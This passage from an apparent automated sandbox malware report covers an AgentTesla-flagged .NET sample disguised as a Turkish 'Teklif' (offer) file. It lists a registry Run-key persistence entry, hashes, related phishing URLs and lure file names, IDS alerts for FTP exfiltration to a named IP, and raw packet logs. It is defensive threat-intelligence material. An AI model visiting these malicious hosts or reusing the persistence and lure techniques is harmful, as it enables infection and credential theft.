| 04:43:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ptqlzgvzpfa C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe |
| 04:43:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ptqlzgvzpfa C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe |

                                                        • 198.143.164.252
                                                        http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        ALASTYRTRBROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • 5.2.85.36
                                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        http://www.idecon.com.trGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.231
                                                        Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        x21iMpR0I1.exeGet hashmaliciousFormBookBrowse
                                                        • 5.2.85.156
                                                        https://upvir.al/153868/lp153868Get hashmaliciousHTMLPhisherBrowse
                                                        • 5.2.85.131
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eRFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                        • 67.212.175.162
                                                        RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 67.212.175.162
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                        • 67.212.175.162
                                                        http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 67.212.175.162
                                                        No context
                                                        Process:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):30208
                                                        Entropy (8bit):5.3534281837524365
                                                        Encrypted:false
                                                        SSDEEP:384:ANepKdJNF1oPvlsBrrFj95okNTvsYxksSvk0HFs0ZILHwz7A8iq8ziXuF:AcQ9F1oaBj95FkYmsScKZHGJt
                                                        MD5:A016634929C4D57CC24719723A4CD65C
                                                        SHA1:91E7492B6D3E543F185C69846BD175A626A931F5
                                                        SHA-256:182B161A951229364AEF6E16D358BEB00F285C9F146053471AD22E714EEFA719
                                                        SHA-512:5F36C1AD444AF94DFD4CA1D4AEF188049FFDCF2A336F58CFEEAD5A55176E580312D3944C229ED8B66CC852F0A4C86B711603EA34FF80EBF1DF6A3F84D61A695A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.3534281837524365
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:Teklif-6205018797-6100052155-UUE.exe
                                                        File size:30'208 bytes
                                                        MD5:a016634929c4d57cc24719723a4cd65c
                                                        SHA1:91e7492b6d3e543f185c69846bd175a626a931f5
                                                        SHA256:182b161a951229364aef6e16d358beb00f285c9f146053471ad22e714eefa719
                                                        SHA512:5f36c1ad444af94dfd4ca1d4aef188049ffdcf2a336f58cfeead5a55176e580312d3944c229ed8b66cc852f0a4c86b711603ea34ff80ebf1df6a3f84d61a695a
                                                        SSDEEP:384:ANepKdJNF1oPvlsBrrFj95okNTvsYxksSvk0HFs0ZILHwz7A8iq8ziXuF:AcQ9F1oaBj95FkYmsScKZHGJt
                                                        TLSH:2CD2D68C738546ABE1AB1F7AA4F207994BF2F692775BC39F3640002A1DE37525C61723
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x408a86
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66F535CB [Thu Sep 26 10:22:03 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a3c | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x5ae | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6a8c | 0x6c00 | c047a0195398db84e9dc60976185a50a | False | 0.47164351851851855 | data | 5.479757107813364 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x5ae | 0x600 | 23528740014c530cd2d4f6b9984aa211 | False | 0.4270833333333333 | data | 4.1245948590178 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc000 | 0xc | 0x200 | c447a5a93c8c9d2c91ecde24a0f18251 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa05c | 0x32c | data | | | 0.4236453201970443
RT_MANIFEST | 0xa3c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T10:43:23.015150+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-27T10:43:23.015150+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-27T10:43:39.090953+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49705 | 5.2.84.236 | 21 | TCP
2024-09-27T10:43:39.726339+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49708 | 5.2.84.236 | 55987 | TCP
2024-09-27T10:43:39.733257+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49708 | 5.2.84.236 | 55987 | TCP
2024-09-27T10:43:46.488310+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 52073 | TCP
2024-09-27T10:43:46.488310+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 52073 | TCP
2024-09-27T10:43:54.928209+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 52077 | TCP
2024-09-27T10:43:54.928209+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 52077 | TCP
2024-09-27T10:44:02.252408+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 52078 | 5.2.84.236 | 21 | TCP
2024-09-27T10:44:02.871511+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 52079 | 5.2.84.236 | 60855 | TCP
2024-09-27T10:44:02.882716+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 52079 | 5.2.84.236 | 60855 | TCP
2024-09-27T10:44:10.402749+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 52080 | 5.2.84.236 | 21 | TCP
2024-09-27T10:44:11.022491+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 52081 | 5.2.84.236 | 52109 | TCP
2024-09-27T10:44:11.027817+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 52081 | 5.2.84.236 | 52109 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Sep 27, 2024 10:43:23.085771084 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.085838079 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.103717089 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.103812933 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170500994 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170548916 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170583010 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170598030 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170648098 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170648098 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170969963 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171035051 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.171375990 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171435118 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.171902895 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171957970 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.172338963 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.172405005 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.172874928 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.172934055 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.173170090 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.173233986 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.173686028 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.173763990 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.174127102 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.174190998 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.174621105 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.174680948 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.175054073 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.175113916 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.175558090 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.175621033 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.178220987 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.178349972 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.192425966 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.192498922 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.258657932 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.258733988 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.258838892 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.258900881 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.259294987 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.259349108 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.259659052 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.259710073 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.259952068 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.260001898 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.260302067 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.260349989 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.260843039 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.260904074 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.260906935 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.260920048 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.260951996 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.261411905 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.261472940 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.263915062 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.264007092 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.264326096 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.264378071 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.264385939 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.264400005 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.264426947 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.264445066 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.264791012 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.264846087 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.265081882 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.265135050 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.265348911 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.265405893 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.280827045 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.280951977 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.347467899 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.347793102 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.347841978 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.347866058 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.347881079 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.347908974 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.348129988 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.348187923 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.348504066 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.348556995 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.348845959 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.348897934 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349170923 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349217892 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349775076 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349818945 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349828959 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349836111 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349869013 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349881887 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349890947 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349898100 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.349940062 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.349973917 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.350655079 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.350723028 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.350778103 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.350832939 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.351617098 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.351666927 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.351680994 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.351687908 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.351711035 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.351731062 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.351737976 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.351766109 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.351780891 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.352492094 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.352555990 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.369344950 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.369463921 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.389889956 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.389997005 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.435973883 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.436110973 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.436111927 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.436125994 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.436170101 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.436189890 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.436378002 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.436435938 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.436880112 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.436965942 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.437370062 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.437434912 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.437576056 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.437628984 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.437810898 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.437865019 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.437865019 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.437876940 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.437911987 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.438889980 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.438946962 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.438973904 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.438982964 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.438996077 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.439001083 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.439037085 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.439040899 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.439062119 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.439089060 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.439752102 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.439807892 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.439817905 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.439824104 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.439853907 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.440687895 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.440752029 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.440764904 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.440778017 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.440809965 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.440826893 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.450987101 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.457947016 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.458058119 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.474580050 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.474750996 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.852402925 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.852416039 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.852499008 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.852616072 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.852674007 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.852679014 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.852689981 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.852725983 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.853149891 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.853195906 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.853212118 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.853219032 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.853244066 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.853262901 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.853957891 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.854002953 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.854031086 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.854038000 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.854058981 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.854079008 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.854938984 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855001926 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855025053 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855030060 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855053902 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855062008 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855084896 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855087996 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855113983 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855138063 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855901957 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855950117 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855974913 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.855982065 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.855992079 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.856005907 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.856034994 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.856040001 CEST4434970467.212.175.162192.168.2.5
